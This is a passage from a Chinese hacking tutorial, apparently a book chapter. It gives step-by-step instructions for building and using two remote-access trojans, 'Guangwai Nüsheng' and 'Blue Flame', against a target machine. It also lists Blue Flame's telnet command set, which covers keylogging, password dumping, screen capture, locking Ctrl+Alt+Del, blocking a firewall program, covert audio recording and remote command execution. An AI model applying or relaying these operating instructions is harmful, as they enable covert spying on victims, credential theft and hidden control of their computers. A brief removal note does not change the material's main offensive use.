黑客攻防技术内幕-入侵者攻击方法(3)
(1) 双击运行广外女生客户端程序。
(2) 单击服务端设置,可以根据【默认值】或是【自定义】单选按钮来进行服务端的设置,如图5-12所示。
图5-12 设置广外女生服务端
(3) 设置完成后单击【生成服务端】按钮,即可在广外女生客户端所在的目标下生成服务端程序。在目标机192.168.100.17运行GDUFS.exe程序。
(4) 在【添加主机】选项卡中,在IP搜索的起始IP和终止IP文本框中输入IP地址192.168.100.17,单击【开始搜索】按钮,即可查找运行广外女生服务端后的计算机192.168.0.100.17,此时便可以完全控制该计算机,如图5-13所示。
图5-13 添加主机
(5) 【文件共享管理】选项卡中,有上传、下载、删除、改名、设置属性、建立文件夹和运行指定文件等功能,如图5-14所示。
图5-14 文件共享操作
(6) 【远程注册表操作】选项卡全面模拟Windows的注册表编辑器,让远程注册表编辑工作有如在本机上操作一样方便,这是其他远程控制程序所不具备的功能,如图5-15 所示。
图5-15 远程注册表操作
(7) 【进程管理】选项卡可以管理远程计算机正在运行的程序,如图5-16所示。
图5-16 进程管理
(8) 设置【屏幕控制】选项卡,可以全屏操作对方的鼠标及键盘,如图5-17所示。
图5-17 屏幕控制
(9) 【密码记录操作】选项卡,可以对远程计算机的密码输入进行记录,如图5-18 所示。
图5-18 密码记录
注:
如果要卸载计算机服务端,可在广外女生【服务器端设置】选项卡中单击【卸载对方服务端】即可。
手工清除方法:请参阅3.2.1 广外女生清除方法
● 蓝色火焰
蓝色火焰是一个没有客户端的木马,所谓无招胜有招,可以根据蓝色火焰配置器程序来生成服务端程序。
功能:计算机里的几乎任何和网路相关的程序都可以用来控制它,如Telnet、sterm、
cterm、Zmud、Ftp、IE、Netscape、Opera、Flashget、Cuteftp等由于没有客户端,甚至可以跨平台如Unix、Linux主机控制。
运行平台:运行于Windows 9x、Windows NT、Windows2000下(由于Nt系统本身安全问题蓝色火焰中的一小部分功能在Windows NT/Windows 2000下会受到限制)
大小:蓝色火焰配置器程序为396KB
服务端程序为:233KB
蓝色火焰配置器程序界面如图5-19所示。
使用方法:
测试版本:蓝色火焰0.5 Preview 2版
测试系统:Windows98
测试计算机:192.168.100.17
图5-19 蓝色火焰配置器程序界面
(1) 双击运行Bluefire配置器程序。
(2) 在“配置蓝色火焰”菜单中根据自己的需要生成蓝色火焰服务端程序。
(3) Telnet管理,单击【开始】→【运行】命令并在打开的【运行】对话框中输入:
telnet 192.168.100.17 19191
如图5-20所示。
图5-20 远程登录到目标机的19191端口
说明:
192.168.100.17是运行蓝色火焰服务端的计算机的IP地址;19191是蓝色火焰服务端默认的Telnet端口号,也可以根据自己的需来设置服务端Telnet的端口。
(4) 基于远程登录控制,远程登录成功后就会出现图5-21所示的图面。
解释说明:
Bluefire->是蓝色火焰的提示符,该程式需要在这个提示符下输入命令,以达到远程控制目的。
图5-21 登录成功画面
下面列出命令的作用:
help 显示简要帮助信息。
exit 退出 当前连接。
ver 显示版本信息。
list 列出当前进程。
passwd 列出记录的密码信息。
clearpw 清空记录的密码信息。
sysinfo 列出计算机的详细信息。
halt 挂起。
screen 运行屏幕保护程序。
sice? 检测是否运行了Soft-ice。
force 注销当前用户。
logoff 注销。
shutdown 关机。
reboot 重启。
poweroff 强行关机。
kill [Process ID] 杀死进程。
例如:kill fffec309,其中fffec309是进程号,可以用list命令得到。
hide [desktop/taskbar/start/trayicon/clock] 隐藏
例如:隐藏桌面,hide desktop ;隐藏任务栏,hide taskbar;隐藏开始按钮,hide start;隐藏右下角图标,hide trayicon;隐藏时钟,hide clock。
show [desktop/taskbar/start/trayicon/clock] 显示
disable [mouse/desktop/task/taskbar/start/cad] 锁定
例如:锁定鼠标,disable mouse;锁定桌面,disable desktop;锁定任务栏,disable task;锁定开始按钮,disable start;锁定Ctrl+Alt+Delete,disable cad 。
enabled [mouse/desktop/task/taskbar/start/cad] 解锁
open [monitor/driver/ftp/http [dir]] 打开
例如:打开显示器,open monitor;打开光驱,open driver;打开Ftp服务器,open ftp (打开后就可以用各种ftp客户端控制,比如可以利用cuteFtp、leechftp等FTP软件对目标计算机进行浏览和文件管理);打开http服务器,open http c:\windows(这样表示以 c:\windows为主目录进行web发布,当然还可以用IE,Netscape,Opera等浏览器进行访问和下载文件)。
close [monitor/driver/ftp/http] 关闭
catch [Jpeg Filename] 捕获当前屏幕
例如:catch c:\screen.jpg,然后可以open http c: 打开http服务器,在IE的地址栏里输入http://IP/screen.jpg就可以浏览到屏幕图像。
changeb [on/off] 交换鼠标键
例如:交换鼠标左右键changeb on;还原鼠标左右键changeb off。
charspy [result/on/off] 键盘记录选项
例如:查看击键记录,charspy result;禁止键盘记录,charspy off;开启键盘记录,charspy on (注意默认情况下已经开启)(记录各种按键,结果不存盘)。
keyspy [result/on/off/clear] 击键记录选项
例如:查看击键记录,keyspy result;禁止键盘记录,keyspy off;开启键盘记录,keyspy on (注意默认情况下已经开启);清空键盘纪录,keyspy clear(这里和上面不同的是这里可以记录中文输入并将结果存盘)。
snapexe 设置EXE文件关连
unsnapexe 解除EXE文件关连
bladd [filename]/blview/blclear 黑名单管理(在关连了exe文件后黑名单生效)。
将程序加入黑名单用法:
bladd regedit(禁用注册表编辑器)
bladd skynet (禁用天网)
blview 查看当前黑名单
blclear 清空当前黑名单
recstart[wav filename]/recstop/recstate
例如:开始录制一段声音,recstart c:\test.wav;结束录制,recstop;显示录音机当前状态,recstate。
cmd [dos command line] 运行dos命令